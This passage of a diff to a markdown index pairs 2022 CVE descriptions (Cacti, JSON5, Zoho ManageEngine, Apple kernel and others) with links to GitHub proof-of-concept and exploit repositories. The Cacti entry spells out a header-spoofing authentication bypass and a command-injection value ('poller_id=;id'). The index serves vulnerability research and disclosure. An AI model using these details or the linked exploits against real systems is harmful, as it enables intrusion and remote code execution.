Version 016 2020 devices improperly manage sessions, which allows remote attackers to bypass authentication in opportunistic circumstances and execute arbitrary commands with administrator privileges by leveraging an existing web portal login. + + +- [ethancunt/CVE-2022-45600](https://github.com/ethancunt/CVE-2022-45600) + +### CVE-2022-45688 (2022-12-13) + +A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. + + +- [scabench/jsonorg-tp1](https://github.com/scabench/jsonorg-tp1) +- [scabench/jsonorg-fp1](https://github.com/scabench/jsonorg-fp1) +- [scabench/jsonorg-fp2](https://github.com/scabench/jsonorg-fp2) +- [scabench/jsonorg-fp3](https://github.com/scabench/jsonorg-fp3) +- [scabench/jsonorg-fn1](https://github.com/scabench/jsonorg-fn1) + +### CVE-2022-45701 (2023-02-17) + +Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature. + + +- [yerodin/CVE-2022-45701](https://github.com/yerodin/CVE-2022-45701) +- [geniuszly/CVE-2022-45701](https://github.com/geniuszly/CVE-2022-45701) + +### CVE-2022-45728 (2023-01-12) + +Doctor Appointment Management System v1.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability. + + +- [sudoninja-noob/CVE-2022-45728](https://github.com/sudoninja-noob/CVE-2022-45728) + +### CVE-2022-45729 (2023-01-12) + +A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee ID parameter. + + +- [sudoninja-noob/CVE-2022-45729](https://github.com/sudoninja-noob/CVE-2022-45729) + +### CVE-2022-45770 (2023-01-26) + +Improper input validation in adgnetworkwfpdrv.sys in Adguard For Windows x86 through 7.11 allows local privilege escalation. + + +- [Marsel-marsel/CVE-2022-45770](https://github.com/Marsel-marsel/CVE-2022-45770) + +### CVE-2022-45771 (2022-12-05) + +An issue in the /api/audits component of Pwndoc v0.5.3 allows attackers to escalate privileges and execute arbitrary code via uploading a crafted audit file. + + +- [p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE](https://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE) +- [yuriisanin/CVE-2022-45771](https://github.com/yuriisanin/CVE-2022-45771) + +### CVE-2022-45808 (2023-01-24) + +SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + + +- [RandomRobbieBF/CVE-2022-45808](https://github.com/RandomRobbieBF/CVE-2022-45808) + +### CVE-2022-45934 (2022-11-27) + +An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets. + + +- [Trinadh465/linux-4.19.72_CVE-2022-45934](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-45934) +- [Trinadh465/linux-4.1.15_CVE-2022-45934](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-45934) +- [Satheesh575555/linux-4.1.15_CVE-2022-45934](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-45934) + +### CVE-2022-45988 (2023-03-03) + +starsoftcomm CooCare 5.304 allows local attackers to escalate privileges and execute arbitrary commands via a crafted file upload. + + +- [happy0717/CVE-2022-45988](https://github.com/happy0717/CVE-2022-45988) + +### CVE-2022-46080 (2023-07-06) + +Nexxt Nebula 1200-AC 15.03.06.60 allows authentication bypass and command execution by using the HTTPD service to enable TELNET. + + +- [yerodin/CVE-2022-46080](https://github.com/yerodin/CVE-2022-46080) +- [geniuszly/CVE-2022-46080](https://github.com/geniuszly/CVE-2022-46080) + +### CVE-2022-46087 (2023-01-30) + +CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user. + + +- [G37SYS73M/CVE-2022-46087](https://github.com/G37SYS73M/CVE-2022-46087) + +### CVE-2022-46104 +- [NurSec747/CVE-2022-46104---POC](https://github.com/NurSec747/CVE-2022-46104---POC) + +### CVE-2022-46164 (2022-12-05) + +NodeBB is an open source Node.js based forum software. Due to a plain object with a prototype being used in socket.io message handling a specially crafted payload can be used to impersonate other users and takeover accounts. This vulnerability has been patched in version 2.6.1. Users are advised to upgrade. Users unable to upgrade may cherry-pick commit `48d143921753914da45926cca6370a92ed0c46b8` into their codebase to patch the exploit.\n + + +- [stephenbradshaw/CVE-2022-46164-poc](https://github.com/stephenbradshaw/CVE-2022-46164-poc) + +### CVE-2022-46166 (2022-12-09) + +Spring boot admins is an open source administrative user interface for management of spring boot applications. All users who run Spring Boot Admin Server, having enabled Notifiers (e.g. Teams-Notifier) and write access to environment variables via UI are affected. Users are advised to upgrade to the most recent releases of Spring Boot Admin 2.6.10 and 2.7.8 to resolve this issue. Users unable to upgrade may disable any notifier or disable write access (POST request) on `/env` actuator endpoint.\n\n + + +- [DickDock/CVE-2022-46166](https://github.com/DickDock/CVE-2022-46166) + +### CVE-2022-46169 (2022-12-05) + +Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing the `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with an `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device - Uptime` or `Device - Polling Time`.\n\nThis command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_...` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch. + + +- [imjdl/CVE-2022-46169](https://github.com/imjdl/CVE-2022-46169) +- [0xf4n9x/CVE-2022-46169](https://github.com/0xf4n9x/CVE-2022-46169) +- [taythebot/CVE-2022-46169](https://github.com/taythebot/CVE-2022-46169) +- [Inplex-sys/CVE-2022-46169](https://github.com/Inplex-sys/CVE-2022-46169) +- [sAsPeCt488/CVE-2022-46169](https://github.com/sAsPeCt488/CVE-2022-46169) +- [c3rrberu5/CVE-2022-46169](https://github.com/c3rrberu5/CVE-2022-46169) +- [Habib0x0/CVE-2022-46169](https://github.com/Habib0x0/CVE-2022-46169) +- [N1arut/CVE-2022-46169_POC](https://github.com/N1arut/CVE-2022-46169_POC) +- [miko550/CVE-2022-46169](https://github.com/miko550/CVE-2022-46169) +- [ariyaadinatha/cacti-cve-2022-46169-exploit](https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit) +- [doosec101/CVE-2022-46169](https://github.com/doosec101/CVE-2022-46169) +- [m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application](https://github.com/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application) +- [devAL3X/CVE-2022-46169_poc](https://github.com/devAL3X/CVE-2022-46169_poc) +- [JacobEbben/CVE-2022-46169_unauth_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46169_unauth_remote_code_execution) +- [icebreack/CVE-2022-46169](https://github.com/icebreack/CVE-2022-46169) +- [devilgothies/CVE-2022-46169](https://github.com/devilgothies/CVE-2022-46169) +- [yassinebk/CVE-2022-46169](https://github.com/yassinebk/CVE-2022-46169) +- [ruycr4ft/CVE-2022-46169](https://github.com/ruycr4ft/CVE-2022-46169) +- [FredBrave/CVE-2022-46169-CACTI-1.2.22](https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22) +- [sha-16/RCE-Cacti-1.2.22](https://github.com/sha-16/RCE-Cacti-1.2.22) +- [Safarchand/CVE-2022-46169](https://github.com/Safarchand/CVE-2022-46169) +- [MarkStrendin/CVE-2022-46169](https://github.com/MarkStrendin/CVE-2022-46169) +- [BKreisel/CVE-2022-46169](https://github.com/BKreisel/CVE-2022-46169) +- [Rickster5555/EH2-PoC](https://github.com/Rickster5555/EH2-PoC) +- [antisecc/CVE-2022-46169](https://github.com/antisecc/CVE-2022-46169) +- [dawnl3ss/CVE-2022-46169](https://github.com/dawnl3ss/CVE-2022-46169) +- [a1665454764/CVE-2022-46169](https://github.com/a1665454764/CVE-2022-46169) +- [0xZon/CVE-2022-46169-Exploit](https://github.com/0xZon/CVE-2022-46169-Exploit) +- [copyleftdev/PricklyPwn](https://github.com/copyleftdev/PricklyPwn) +- [0xN7y/CVE-2022-46169](https://github.com/0xN7y/CVE-2022-46169) +- [mind2hex/CVE-2022-46169](https://github.com/mind2hex/CVE-2022-46169) +- [HPT-Intern-Task-Submission/CVE-2022-46169](https://github.com/HPT-Intern-Task-Submission/CVE-2022-46169) +- [lof1sec/CVE-2022-46169](https://github.com/lof1sec/CVE-2022-46169) + +### CVE-2022-46175 (2022-12-24) + +JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later. + + +- [giz-berlin/quasar-app-webpack-json5-vulnerability](https://github.com/giz-berlin/quasar-app-webpack-json5-vulnerability) + +### CVE-2022-46196 +- [dpgg101/CVE-2022-46196](https://github.com/dpgg101/CVE-2022-46196) + +### CVE-2022-46381 (2022-12-13) + +Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. + + +- [amitlttwo/CVE-2022-46381](https://github.com/amitlttwo/CVE-2022-46381) + +### CVE-2022-46395 (2023-03-06) + +An issue was discovered in the Arm Mali GPU Kernel Driver. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Midgard r0p0 through r32p0, Bifrost r0p0 through r41p0 before r42p0, Valhall r19p0 through r41p0 before r42p0, and Avalon r41p0 before r42p0. + + +- [Pro-me3us/CVE_2022_46395_Gazelle](https://github.com/Pro-me3us/CVE_2022_46395_Gazelle) +- [Pro-me3us/CVE_2022_46395_Raven](https://github.com/Pro-me3us/CVE_2022_46395_Raven) +- [SmileTabLabo/CVE-2022-46395](https://github.com/SmileTabLabo/CVE-2022-46395) + +### CVE-2022-46463 (2023-01-12) + +An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. NOTE: the vendor's position is that this "is clearly described in the documentation as a feature." + + +- [nu0l/CVE-2022-46463](https://github.com/nu0l/CVE-2022-46463) +- [404tk/CVE-2022-46463](https://github.com/404tk/CVE-2022-46463) +- [CodeSecurityTeam/harbor](https://github.com/CodeSecurityTeam/harbor) + +### CVE-2022-46484 (2023-08-02) + +Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys. + + +- [WodenSec/CVE-2022-46484](https://github.com/WodenSec/CVE-2022-46484) + +### CVE-2022-46485 (2023-08-02) + +Data Illusion Survey Software Solutions ngSurvey version 2.4.28 and below is vulnerable to Denial of Service if a survey contains a "Text Field", "Comment Field" or "Contact Details". + + +- [WodenSec/CVE-2022-46485](https://github.com/WodenSec/CVE-2022-46485) + +### CVE-2022-46505 (2023-01-18) + +An issue in MatrixSSL 4.5.1-open and earlier leads to failure to securely check the SessionID field, resulting in the misuse of an all-zero MasterSecret that can decrypt secret data. + + +- [SmallTown123/details-for-CVE-2022-46505](https://github.com/SmallTown123/details-for-CVE-2022-46505) + +### CVE-2022-46604 (2023-02-02) + +An issue in Tecrail Responsive FileManager v9.9.5 and below allows attackers to bypass the file extension check mechanism and upload a crafted PHP file, leading to arbitrary code execution. + + +- [galoget/ResponsiveFileManager-CVE-2022-46604](https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604) + +### CVE-2022-46622 (2023-01-12) + +A cross-site scripting (XSS) vulnerability in Judging Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter. + + +- [sudoninja-noob/CVE-2022-46622](https://github.com/sudoninja-noob/CVE-2022-46622) + +### CVE-2022-46623 (2023-01-12) + +Judging Management System v1.0.0 was discovered to contain a SQL injection vulnerability via the username parameter. + + +- [sudoninja-noob/CVE-2022-46623](https://github.com/sudoninja-noob/CVE-2022-46623) + ### CVE-2022-46638 - [naonymous101/CVE-2022-46638](https://github.com/naonymous101/CVE-2022-46638) +### CVE-2022-46689 (2022-12-15) + +A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges. + + +- [zhuowei/MacDirtyCowDemo](https://github.com/zhuowei/MacDirtyCowDemo) +- [ahkecha/McDirty](https://github.com/ahkecha/McDirty) +- [straight-tamago/NoCameraSound](https://github.com/straight-tamago/NoCameraSound) +- [ginsudev/WDBFontOverwrite](https://github.com/ginsudev/WDBFontOverwrite) +- [mineek/FileManager](https://github.com/mineek/FileManager) +- [straight-tamago/NoHomeBar](https://github.com/straight-tamago/NoHomeBar) +- [straight-tamago/DockTransparent](https://github.com/straight-tamago/DockTransparent) +- [straight-tamago/FileSwitcherX](https://github.com/straight-tamago/FileSwitcherX) +- [BomberFish/Mandela-Legacy](https://github.com/BomberFish/Mandela-Legacy) +- [BomberFish/JailedCement](https://github.com/BomberFish/JailedCement) +- [BomberFish/Mandela-Classic](https://github.com/BomberFish/Mandela-Classic) +- [enty8080/MacDirtyCow](https://github.com/enty8080/MacDirtyCow) +- [tdquang266/MDC](https://github.com/tdquang266/MDC) +- [69camau/sw1tch](https://github.com/69camau/sw1tch) + +### CVE-2022-46718 (2023-06-23) + +A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, macOS Monterey 12.6.2. An app may be able to read sensitive location information + + +- [biscuitehh/cve-2022-46718-leaky-location](https://github.com/biscuitehh/cve-2022-46718-leaky-location) + +### CVE-2022-46836 (2023-02-20) + +PHP code injection in watolib auth.php and hosttags.php in Tribe29's Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29 allows an attacker to inject and execute PHP code which will be executed upon request of the vulnerable component. + + +- [JacobEbben/CVE-2022-46836_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46836_remote_code_execution) + +### CVE-2022-47102 (2023-01-12) + +A cross-site scripting (XSS) vulnerability in Student Study Center Management System V 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. + + +- [sudoninja-noob/CVE-2022-47102](https://github.com/sudoninja-noob/CVE-2022-47102) + +### CVE-2022-47130 (2023-02-03) + +A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows a discount coupon to be arbitrarily created if an attacker with administrative privileges interacts on the CSRF page. + + +- [OpenXP-Research/CVE-2022-47130](https://github.com/OpenXP-Research/CVE-2022-47130) + +### CVE-2022-47131 (2023-02-03) + +A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows an attacker to arbitrarily create a page. + + +- [OpenXP-Research/CVE-2022-47131](https://github.com/OpenXP-Research/CVE-2022-47131) + +### CVE-2022-47132 (2023-02-03) + +A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows attackers to arbitrarily add Administrator users. + + +- [OpenXP-Research/CVE-2022-47132](https://github.com/OpenXP-Research/CVE-2022-47132) + +### CVE-2022-47197 (2023-01-19) + +An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post. + + +- [miguelc49/CVE-2022-47197-2](https://github.com/miguelc49/CVE-2022-47197-2) +- [miguelc49/CVE-2022-47197-1](https://github.com/miguelc49/CVE-2022-47197-1) + +### CVE-2022-47373 (2023-02-15) + +Reflected Cross Site Scripting in Search Functionality of Module Library in Pandora FMS Console v766 and lower. This vulnerability arises on the forget password functionality in which parameter username does not proper input validation/sanitization thus results in executing malicious JavaScript payload. + + +- [Argonx21/CVE-2022-47373](https://github.com/Argonx21/CVE-2022-47373) + +### CVE-2022-47529 (2023-03-28) + +Insecure Win32 memory objects in Endpoint Windows Agents in RSA NetWitness Platform before 12.2 allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. + + +- [hyp3rlinx/CVE-2022-47529](https://github.com/hyp3rlinx/CVE-2022-47529) + +### CVE-2022-47615 (2023-01-24) + +Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + + +- [RandomRobbieBF/CVE-2022-47615](https://github.com/RandomRobbieBF/CVE-2022-47615) + +### CVE-2022-47872 (2023-02-01) + +A Server-Side Request Forgery (SSRF) in maccms10 v2021.1000.2000 allows attackers to force the application to make arbitrary requests via a crafted payload injected into the Name parameter under the Interface address module. + + +- [Cedric1314/CVE-2022-47872](https://github.com/Cedric1314/CVE-2022-47872) + +### CVE-2022-47909 (2023-02-20) + +Livestatus Query Language (LQL) injection in the AuthUser HTTP query header of Tribe29's Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL) allows an attacker to perform direct queries to the application's core from localhost. + + +- [JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion](https://github.com/JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion) + +### CVE-2022-47952 (2023-01-01) + +lxc-user-nic in lxc through 5.0.1 is installed setuid root, and may allow local users to infer whether any file exists, even within a protected directory tree, because "Failed to open" often indicates that a file does not exist, whereas "does not refer to a network namespace path" often indicates that a file exists. NOTE: this is different from CVE-2018-6556 because the CVE-2018-6556 fix design was based on the premise that "we will report back to the user that the open() failed but the user has no way of knowing why it failed"; however, in many realistic cases, there are no plausible reasons for failing except that the file does not exist. + + +- [MaherAzzouzi/CVE-2022-47952](https://github.com/MaherAzzouzi/CVE-2022-47952) + +### CVE-2022-47966 (2023-01-18) + +Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache Santuario xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. This affects Access Manager Plus before 4308, Active Directory 360 before 4310, ADAudit Plus before 7081, ADManager Plus before 7162, ADSelfService Plus before 6211, Analytics Plus before 5150, Application Control Plus before 10.1.2220.18, Asset Explorer before 6983, Browser Security Plus before 11.1.2238.6, Device Control Plus before 10.1.2220.18, Endpoint Central before 10.1.2228.11, Endpoint Central MSP before 10.1.2228.11, Endpoint DLP before 10.1.2137.6, Key Manager Plus before 6401, OS Deployer before 1.1.2243.1, PAM 360 before 5713, Password Manager Pro before 12124, Patch Manager Plus before 10.1.2220.18, Remote Access Plus before 10.1.2228.11, Remote Monitoring and Management (RMM) before 10.1.41. ServiceDesk Plus before 14004, ServiceDesk Plus MSP before 13001, SupportCenter Plus before 11026, and Vulnerability Manager Plus before 10.1.2220.18. Exploitation is only possible if SAML SSO has ever been configured for a product (for some products, exploitation requires that SAML SSO is currently active). + + +- [horizon3ai/CVE-2022-47966](https://github.com/horizon3ai/CVE-2022-47966) +- [shameem-testing/PoC-for-ME-SAML-Vulnerability](https://github.com/shameem-testing/PoC-for-ME-SAML-Vulnerability) +- [Inplex-sys/CVE-2022-47966](https://github.com/Inplex-sys/CVE-2022-47966) +- [ACE-Responder/CVE-2022-47966_checker](https://github.com/ACE-Responder/CVE-2022-47966_checker) +- [vonahisec/CVE-2022-47966-Scan](https://github.com/vonahisec/CVE-2022-47966-Scan) + +### CVE-2022-47986 (2023-02-17) + +\nIBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.\n\n + + +- [ohnonoyesyes/CVE-2022-47986](https://github.com/ohnonoyesyes/CVE-2022-47986) +- [dhina016/CVE-2022-47986](https://github.com/dhina016/CVE-2022-47986) +- [mauricelambert/CVE-2022-47986](https://github.com/mauricelambert/CVE-2022-47986) + +### CVE-2022-48150 (2023-04-21) + +Shopware v5.5.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the recovery/install/ URI. + + +- [sahilop123/-CVE-2022-48150](https://github.com/sahilop123/-CVE-2022-48150) + +### CVE-2022-48194 (2022-12-30) + +TP-Link TL-WR902AC devices through V3 0.9.1 allow remote authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) by uploading a crafted firmware update because the signature check is inadequate. + + +- [otsmr/internet-of-vulnerable-things](https://github.com/otsmr/internet-of-vulnerable-things) + +### CVE-2022-48197 (2023-01-02) + +Reflected cross-site scripting (XSS) exists in Sandbox examples in the YUI2 repository. The download distributions, TreeView component and the YUI Javascript library overall are not affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + + +- [ryan412/CVE-2022-48197](https://github.com/ryan412/CVE-2022-48197) + +### CVE-2022-48311 (2023-02-06) + +**UNSUPPORTED WHEN ASSIGNED** Cross Site Scripting (XSS) in HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B allows authenticated attacker to inject their own script into the page via HTTP configuration page. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + + +- [swzhouu/CVE-2022-48311](https://github.com/swzhouu/CVE-2022-48311) + +### CVE-2022-48429 (2023-03-27) + +In JetBrains Hub before 2022.3.15573, 2022.2.15572, 2022.1.15583 reflected XSS in dashboards was possible\n + + +- [echo-devim/CVE-2022-48429_poc](https://github.com/echo-devim/CVE-2022-48429_poc) + +### CVE-2022-48474 (2023-09-12) + +Control de Ciber, in its 1.650 version, is affected by a Denial of Service condition through the version function. Sending a malicious request could cause the server to check if an unrecognized component is up to date, causing a memory failure error that shuts down the process. + + +- [sapellaniz/CVE-2022-48474_CVE-2022-48475](https://github.com/sapellaniz/CVE-2022-48474_CVE-2022-48475) + +### CVE-2022-48565 (2023-08-22) + +An XML External Entity (XXE) issue was discovered in Python through 3.9.1. The plistlib module no longer accepts entity declarations in XML plist files to avoid XML vulnerabilities. + + +- [Einstein2150/CVE-2022-48565-POC](https://github.com/Einstein2150/CVE-2022-48565-POC) + ## 2021 ### CVE-2021-0302 (2021-02-10) @@ -6942,6 +28443,7 @@ - [blackm4c/CVE-2021-41805](https://github.com/blackm4c/CVE-2021-41805) +- [acfirthh/CVE-2021-41805](https://github.com/acfirthh/CVE-2021-41805) ### CVE-2021-41822 - [badboycxcc/CVE-2021-41822](https://github.com/badboycxcc/CVE-2021-41822) @@ -8023,7 +29525,6 @@ - [mr-vill4in/log4j-fuzzer](https://github.com/mr-vill4in/log4j-fuzzer) - [mebibite/log4jhound](https://github.com/mebibite/log4jhound) - [sdogancesur/log4j_github_repository](https://github.com/sdogancesur/log4j_github_repository) -- [jrocia/Search-log4Jvuln-AppScanSTD](https://github.com/jrocia/Search-log4Jvuln-AppScanSTD) - [aajuvonen/log4stdin](https://github.com/aajuvonen/log4stdin) - [arnaudluti/PS-CVE-2021-44228](https://github.com/arnaudluti/PS-CVE-2021-44228) - [ColdFusionX/CVE-2021-44228-Log4Shell-POC](https://github.com/ColdFusionX/CVE-2021-44228-Log4Shell-POC)